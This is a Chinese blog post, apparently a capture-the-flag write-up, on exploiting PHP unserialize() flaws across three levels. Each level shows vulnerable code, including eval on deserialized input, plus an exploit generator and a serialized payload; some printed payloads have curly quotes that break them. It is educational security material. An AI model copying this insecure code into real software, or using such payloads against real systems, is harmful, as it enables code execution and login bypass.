PHP代码审计-反序列化漏洞
Last updated on July 8, 2025 pm
所有的 flag 均在 flag.php 的 $flag 变量中
level 1
<?php
highlight_file(__FILE__);
class a{
var $act;
function action(){
eval($this->act);
}
}
$a=unserialize($_GET['flag']);
$a->action();
?>eval函数为代码执行函数,将字符串作为php代码执行,已知 flag 在 flag.php 文件中,先将 flag.php 文件包含进来,再对 flag 变量进行输出
exp:
<?php
highlight_file(__FILE__);
class a{
var $act;
function action(){
eval($this->act);
}
}
$test = new a;
$test->act = 'include("flag.php");echo $flag;';
echo serialize($test)生成的payload:
O:1:”a”:1:{s:3:”act”;s:31:”include(“flag.php”);echo $flag;”;}
level 2
<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin{
var $user;
var $pass;
function __construct($user,$pass){
$this->user=$user;
$this->pass=$pass;
}
function login(){
if ($this->user=="daydream" and $this->pass=="ok"){
return 1;
}
}
}
$a=unserialize($_GET['param']);
if($a->login())
{
echo $flag;
}
?>login 方法中校验 user 和 pass 的值,如果返回结果为真,则输出 $flag
__construct 初始化方法
exp:
<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin{
var $user;
var $pass;
function __construct($user,$pass){
$this->user=$user;
$this->pass=$pass;
}
function login(){
if ($this->user=="daydream" and $this->pass=="ok"){
return 1;
}
}
}
$test = new mylogin("daydream","ok");
echo serialize($test);
?>payload:
O:7:”mylogin”:2:{s:4:”user”;s:8:”daydream”;s:4:”pass”;s:2:”ok”;}
level 3
<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin{
var $user;
var $pass;
function __construct($user,$pass){
$this->user=$user;
$this->pass=$pass;
}
function login(){
if ($this->user=="daydream" and $this->pass=="ok"){
return 1;
}
}
}
$a=unserialize($_COOKIE['param']);
if($a->login())
{
echo $flag;
}
?>与 level 2 相似 注意 超全局变量 $_COOKIE ,通过cookie 传参传入 payload ,同时进行一下url编码
payload:
O%3a7%3a%22mylogin%22%3a2%3a%7bs%3a4%3a%22user%22%3bs%3a8%3a%22daydream%22%3bs%3a4%3a%22pass%22%3bs%3a2%3a%22ok%22%3b%7d
未完待续。。。
PHP代码审计-反序列化漏洞
https://blog.lixey.top/posts/bcdf8f30/